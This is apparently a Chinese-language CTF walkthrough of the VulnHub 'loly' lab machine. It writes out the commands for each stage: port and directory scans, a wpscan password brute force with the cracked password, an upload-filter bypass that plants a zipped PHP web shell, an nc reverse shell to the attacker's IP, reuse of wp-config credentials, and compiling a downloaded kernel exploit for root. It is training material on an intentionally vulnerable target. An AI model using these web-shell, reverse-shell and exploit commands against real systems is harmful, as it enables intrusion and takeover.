vulnhub靶場之loly靶機

前言

  • 挑戰攻克該靶機30分鐘

靶機:loly靶機,IP地址為192.168.10.11

攻擊:kali,IP地址為192.168.10.6

靶機和攻擊機都采用VMware虛擬機,都采用橋接網卡模式

文章涉及的靶機及工具,都可以自行訪問官網或者項目地址進行獲取,或者通過網盤鏈接下載 https://pan.quark.cn/s/a795145e3869

主機發現

也就是相當于現實環境中去發現確定主機的ip地址,因為這里是靶機環境,所以跳過了從域名到ip地址的過程。

使用arp-scan -l或者netdiscovery -r 192.168.10.1/24

當然也可以使用nmap等工具進行

arp-scan -l

信息收集

使用nmap掃描目標端口等信息

首先掃描目標的tcp端口的開放情況

nmap -sT --min-rate=1000 192.168.10.11 -p- -oA nmap-tcp

再掃描udp端口的開放情況

nmap -sU --min-rate=1000 192.168.10.11 --top-ports 20 -oA nmap-udp

可以看到明確開放的udp端口沒有,所以下面對tcp端口進行一個篩選,這里因為22端口并不是明確closed的,是filtered的,所以也要包括在內

ports=`grep /tcp nmap-tcp.nmap | awk -F'/' '{print $1}' | paste -sd ','`

進一步對這些端口進行服務、系統等探測

nmap -sV -O -sC 192.168.10.11 -p $ports --min-rate=1000

再使用nmap的漏洞檢測腳本對這些端口進行探測

nmap --script=vuln 192.168.10.11 -p $ports

枚舉出的目錄,可能是wordpress的CMS

網站信息探測

訪問80端口的界面,是nginx安裝后的默認界面,頁面源代碼沒有信息泄露

使用whatweb或者瀏覽器插件wappalyzer進行查看相關配置

whatweb http://192.168.10.11 -v

使用gobuster等目錄爆破工具進行測試

gobuster dir -u http://192.168.10.11 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -b 404 -x php,html,txt,md,zip

訪問wordpress,可以看到,很是雜亂,這個不用說了吧,一般可能都需要綁定域名了

隨便點擊一個鏈接,可以發現指向的域名loly.lc,或者自己去查看頁面源代碼

綁定域名,采用靜態文件hosts,計算機會優先去查看這個文件中的解析對應。

linux系統中,文件在/etc/hostswindows系統,文件在C:\Windows\System32\Drivers\etc\hosts

這里使用的是kali,所以修改/etc/hosts文件

再次訪問,可以發現,解析成功

wordpress探測

使用whatweb進一步探測,發現wordpress的版本信息

whatweb http://192.168.10.11/wordpress -v

那么下一步,使用針對wordpress的工具wpscan

wpscan --url http://192.168.10.11/wordpress -e u

枚舉出用戶,進一步進行密碼破解

wpscan --url http://192.168.10.11/wordpress -U loly -P /usr/share/wordlists/rockyou.txt

用戶名loly和密碼fernando

文件上傳

在登錄后,經過多方測試,最終在插件AdRotate中,找到一個文件上傳的測試點,并且在尋找的時候,也發現在相關設置中有文件上傳后的地址,很清晰了,只是文件上傳的種種需要多方測試

首先就是簡單的測試:

  1. 直接上傳php,不行
  2. 修改后綴名再上傳,不行。
  3. 后綴名出以shell.php.jpg,生成圖片馬。不行
  4. 雙寫php以及大小寫php,不行
  5. 更改mime類型,不行
  6. 以圖片的形式上傳,不解析為php
  7. 無法上傳.htaccess文件,無法修改解析

根據上面,測試其他的幾種,也就是js,html,zip

  1. html類型,不解析為php,所以不行
  2. js類型,顯示源代碼,也不解析,不行
  3. zip壓縮后的文件,可以,并成功解析

只是上傳為zip文件,訪問的時候以php訪問。如

info.php.zip,訪問的時候為info.php

這里注意一點,采用linxu中的zip壓縮工具,不要使用windows壓縮,不一樣

echo "<?php phpinfo();?>" > info.phpzip -r -o info.php.zip info.php 

我也測試過,把壓縮包的數據進行抓包然后截取,但是不行。所以我放棄使用windows上傳這個腳本了

那么編寫一個代碼,以可以命令執行

echo '<?php system($_GET["loly"]);?>' > shell.php
zip -r -o shell.php.zip shell.php

上傳后,訪問即可,構造shell.php?loly=ls,即可發現

構造反彈shell代碼,首先在kali開啟監聽,然后再使用下面代碼

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.10.6 9999 >/tmp/f
#進行url編碼
rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Cbash%20-i%202%3E%261%7Cnc%20192.168.10.6%209999%20%3E%2Ftmp%2Ff

靶機內信息收集

既然有wordpress,那么就一定要看看其配置文件wp-config.php

獲取用戶名wordpress和密碼lolyisabeautifulgirl

查看網絡狀態

ss -antulp

發現3306開放,可能就是mysql,以前面的登錄測試,登錄之前,先測試安裝什么版本的python

dpkg -l | grep python
#加一層shell
python3 -c 'import pty;pty.spawn("/bin/bash")'

數據庫中只有一個用戶名和密碼,與前面枚舉出的一樣

繼續探測信息,首先知道兩個密碼。fernandololyisabeautifulgirl

查看當前系統用戶,發現只有loly一個

使用find尋找具有SUID權限的文件,發現sudosu

find / -perm -4000 -print 2>/dev/null

sudo -l測試,需要密碼

嘗試使用兩個密碼,測試loly,是否存在多用的情況

成功了,以lolyisabeautifulgirl登錄

再次使用sudo -l,沒有文件給loly使用。

收集內核版本等信息

uname -a
uname -r
cat /etc/issue
cat /etc/*release
lsb_release

當然,后面其實還有腳本上傳進行檢測,不過因為這里搜索到合適的提權腳本,并且可以使用,所以不上傳腳本了

提權

使用gcc -v確定靶機安裝了gcc

使用searchsploit搜索到可利用的漏洞

searchsploit 4.4.0-31 ubuntu Privilege

根據內核版本和系統信息,這些都是可以測試的,先測試第二個45010.c

#把腳本下載到當前目錄下
searchsploit -m 45010.c

然后查看腳本

kali使用python開啟監聽,然后靶機使用wget下載即可

#kali執行
python3 -m http.server 1234#靶機執行
wget http://192.168.10.6:1234/45010.c

這里在loly的主目錄,因為他有一個腳本,可能會定期清理/tmp目錄,我也不想再更改腳本,省時間

靶機執行腳本中編譯和執行即可

gcc 45010.c -o exp
chmod +x exp
./exp

對應其他的腳本能否提權,自己去試試,一定要動手測試,積累經驗

總結

該靶機的考察主要就是從web到內網

  1. 網站主流CMS的識別
  2. wpscan的使用,當然爆破也可以使用其他工具,如burp等,不過這個工具是專門針對wordpress,所以,建議使用
  3. 文件上傳如何繞過檢測,這里應該是利用對于壓縮包的一個解析漏洞,導致執行了php代碼
  4. wordpress的配置文件要清楚
  5. 靶機內的信息收集,內核等信息

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/pingmian/72666.shtml
繁體地址,請注明出處:http://hk.pswp.cn/pingmian/72666.shtml
英文地址,請注明出處:http://en.pswp.cn/pingmian/72666.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

Deepseek API+Python測試用例一鍵生成與導出-V1.0.2【實現需求文檔圖片識別與用例生成自動化】

在測試工作中&#xff0c;需求文檔中的圖片&#xff08;如界面設計圖、流程圖&#xff09;往往是測試用例生成的重要參考。然而&#xff0c;手動提取圖片并識別內容不僅耗時&#xff0c;還容易出錯。本文將通過一個自研小工具&#xff0c;結合 PaddleOCR 和大模型&#xff0c;自…

Excel(函數篇):COUNTIF與CONUTIFS函數、SUMIF與SUMIFS函數、ROUND函數、MATCH與INDEX函數、混合引用與條件格式

目錄 COUNTIF和COUNTIFS函數COUNTIF函數COUNTIFS函數SUMIF和SUMIFS函數SUMIF函數SUMIFS函數SUMIFS函數與控件實現動態年月匯總ROUND、ROUNDUP、ROUNDDOWN函數單元格混合引用條件格式與公式,標記整行數據MATCH和INDEX函數COUNTIF和COUNTIFS函數 COUNTIF函數 統計下“蘇州”出現…

上位機數據可視化:使用QtCharts繪制波形圖

工程配置 CMake文件 find_package(Qt5 COMPONENTS Charts REQUIRED)target_link_libraries(zhd-desktop PRIVATE Qt5::Charts)包含頭文件以及名稱空間&#xff08;這個很重要&#xff0c;沒有包含名稱空間編譯器會提示找不到相關的類型&#xff09; #include <QtCharts&g…

S32K144入門筆記(十三):LPIT的API函數解讀

目錄 1. SDK中的函數 2. API函數的釋義 2.1 獲取默認參數 2.2 初始化 2.3 啟動與停止 2.4 計數值的設置于讀取 2.5 中斷API 1. SDK中的函數 在使用SDK的非抽象驅動函數時&#xff0c;函數的定義與聲明在文件lpit_driver.c和lpit_driver.h中&#xff0c;一共有19個函數&a…

CSS - Pseudo-classes(偽類選擇器)

目錄 一、介紹二、常用種類三、案例實現案例一&#xff1a;a標簽使用link/visited/hover/active案例二&#xff1a;表單元素使用focus/disabled案例三、通過其余偽類實現元素靈活選中 一、介紹 CSS 偽類&#xff08;Pseudo-classes&#xff09; 用于定義元素的特定狀態或結構位…

http proxy的原理是什么

Http代理的原理 代理服務器會自動提取請求數據包中的HTTP請求數據發送給服務端&#xff0c;并將服務端的HTTP響應數據轉發給發送請求的客戶端&#xff0c;HTTP代理服務器使用的端口通常是8080。 對于Web客戶端來說&#xff0c;代理扮演的服務器角色&#xff0c;接收請求&…

Ubuntu22.04虛擬機里安裝Yolov8流程

1. 安裝pytorch sudo apt install nvidia-cuda-toolkit nvcc --version # 官方適配地址&#xff1a;https://download.pytorch.org/whl/torch/import torch print(torch.__version__) print(torch.cuda.is_available())2. 安裝環境 # cuDNN 安裝&#xff1a;https://develop…

神經網絡微調技術解析

神經網絡微調技術 微調&#xff08;Fine-tuning&#xff09;是遷移學習的核心技術&#xff0c;通過在預訓練模型基礎上調整參數&#xff0c;使其適應特定任務或領域。以下從傳統方法、參數高效微調&#xff08;PEFT&#xff09;、新興技術三個維度展開&#xff0c;覆蓋主流技術…

Spring 聲明式事務管理

Spring 編程的方式實現事務管理&#xff0c;這樣太過麻煩&#xff0c;需要在每個方法上面加上相應的事務處理操作&#xff0c;聲明式事務處理能夠很好的解決這個問題&#xff0c;比如通過tx命名空間&#xff0c;這樣只需要配置就可以檢測到相關的方法&#xff0c;或者是通過tra…

電機控制常見面試問題(十五)

文章目錄 一、電機氣隙二、電氣時間三.電機三環控制詳解四.驅動板跳線意義五.電機開環自檢 一、電機氣隙 電機氣隙是定子和轉子之間的空隙&#xff0c;防止釘子轉子運轉時物理接觸&#xff0c;此外&#xff0c;氣隙是磁路的重要環節&#xff0c;磁場需通過氣隙傳遞能量&#x…

代碼隨想錄算法訓練營第六十五天| 圖論10

Bellman_ford 隊列優化算法&#xff08;又名SPFA&#xff09; 代碼隨想錄 import collectionsdef main():n, m map(int, input().strip().split())edges [[] for _ in range(n 1)]for _ in range(m):src, dest, weight map(int, input().strip().split())edges[src].append…

Chat2DB:讓數據庫管理像聊天一樣簡單

數據庫工具的痛點與破局 在數據爆炸的時代&#xff0c;數據庫管理工具已成為企業高效運營的剛需。然而&#xff0c;傳統工具如Navicat、DBeaver雖功能強大&#xff0c;卻讓非技術人員和SQL新手望而卻步。復雜的界面、繁瑣的手動操作、晦澀的語法規則&#xff0c;成為橫亙在數據…

Navicat for Snowflake 震撼首發,激活數據倉庫管理全新動能

近日&#xff0c;Navicat 家族迎來了一位全新成員 — Navicat for Snowflake。Snowflake 是一款基于云架構的現代數據倉庫解決方案&#xff0c;以其彈性擴展、高性能和易用性著稱。這次首發的Navicat for Snowflake 專為簡化 Snowflake 數據庫管理任務而精心打造。它憑借其直觀…

【項目合集】智能語音小車-微信小程序控制

功能需求&#xff1a; 車子檢測環境溫度、濕度&#xff0c;上報 APP、WEB 端顯示實時數據可通過 APP 控制小車前進、左轉、右轉可通過語音控制小車前進后退車上一個 LED 燈&#xff0c;可通過 WEB、小程序控制在 APP、WEB 上均可注冊登錄 硬件清單 硬件 功能 備注 ESP32 …

人工智能與人的智能,改變一生的思維模型分享【4】決策樹

決策樹&#xff08; DECISION TREE&#xff09; 一般由一個決策圖和若干可能的結果組成。是一種通過羅列解題的關鍵步驟以及各步驟發生的條件和結果&#xff0c;由此來創建到達目標的規劃。 我們很早就知道有一個方法&#xff0c;叫做當你苦悶、糾結的時候&#xff0c;把你的所…

利用余弦相似度在大量文章中找出抄襲的文章

我前面的2篇文章分別講了如果利用余弦相似度來判斷2篇文章的相似度&#xff0c;來確定文章是否存在抄襲&#xff0c;和余弦相似度的原理&#xff0c;即余弦相似度到底是怎么來判斷文章的相似性高低的等等。這一篇再說下&#xff0c;對于文章字數多和大量文章時&#xff0c;如果…

設計模式-對象創建

對象創建 前言1. Factory Method1.1 模式介紹1.2 模式代碼1.2.1 問題代碼1.2.2 重構代碼 1.3 模式類圖1.4 要點總結 2. Abstract Factory2.1 模式介紹2.2 模式代碼2.2.1 問題代碼2.2.2 重構代碼 2.3 模式類圖2.4 要點總結 3. Prototype3.1 模式介紹3.2 模式代碼3.3 模式類圖3.4…

SQLAlchemy系列教程:批量插入數據

高效地批量插入數據對于應用程序的性能至關重要。SQLAlchemy為批處理操作提供了幾種機制&#xff0c;可以最大限度地減少開銷并加快數據庫事務時間。在本指南中&#xff0c;我們將探討如何使用SQLAlchemy執行批量插入&#xff0c;包括從基礎技術到高級技術。 搭建環境 在開始之…

V2X驗證

1. 標準和規范驗證 歐洲對 DSRC 和 V2X 系統有一系列的標準和規范,主要由 ETSI (European Telecommunications Standards Institute) 和 IEEE 等組織制定。驗證通常包括以下標準和規范: ETSI EN 302 571:這是DSRC在歐洲的主要標準,規定了DSRC系統的技術要求和操作條件。ET…

openEuler系統遷移 Docker 數據目錄到 /home,解決Docker 臨時文件占用大問題

根據錯誤信息 write /var/lib/docker/tmp/...: no space left on device&#xff0c;問題的根源是 根分區&#xff08;/&#xff09;的磁盤空間不足&#xff0c;而非 /home 分區的問題。以下是詳細解釋和解決方案&#xff1a; 問題原因分析 Docker 臨時文件占用根分區空間&…